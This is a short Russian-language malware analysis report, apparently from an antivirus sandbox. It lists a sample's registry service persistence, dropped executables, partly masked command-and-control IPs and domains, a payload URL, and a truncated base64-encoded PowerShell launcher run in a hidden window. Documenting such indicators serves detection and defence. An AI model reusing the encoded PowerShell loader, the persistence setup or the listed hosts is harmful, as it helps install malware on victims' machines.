Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\mgmorg] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\mgmorg] 'ImagePath' = '"%WINDIR%\SysWOW64\mgmorg.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABXAHUAagBoAG8AbgBqAHUAYgB0AHEAagA9ACcAUgBrAHQAdABhAGoAeABjAGgAagB4ACcAOwAkAE0AcgBrAHYAdQBvAHkAZwBkAG...
- %HOMEPATH%\894.exe
- %HOMEPATH%\894.exe
- %HOMEPATH%\894.exe в %WINDIR%\syswow64\mgmorg.exe
- %HOMEPATH%\894.exe
- '19#.#6.118.15':443
- '10#.#27.100.228':80
- '12#.#38.101.250':80
- http://ks.#d.ua/wp-includes/KXdkADm/
- DNS ASK li###more.tk
- DNS ASK ig###istics.in
- DNS ASK su####roshomes.com
- DNS ASK ks.#d.ua
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABXAHUAagBoAG8AbgBqAHUAYgB0AHEAagA9ACcAUgBrAHQAdABhAGoAeABjAGgAagB4ACcAOwAkAE0AcgBrAHYAdQBvAHkAZwBkAG...' (со скрытым окном)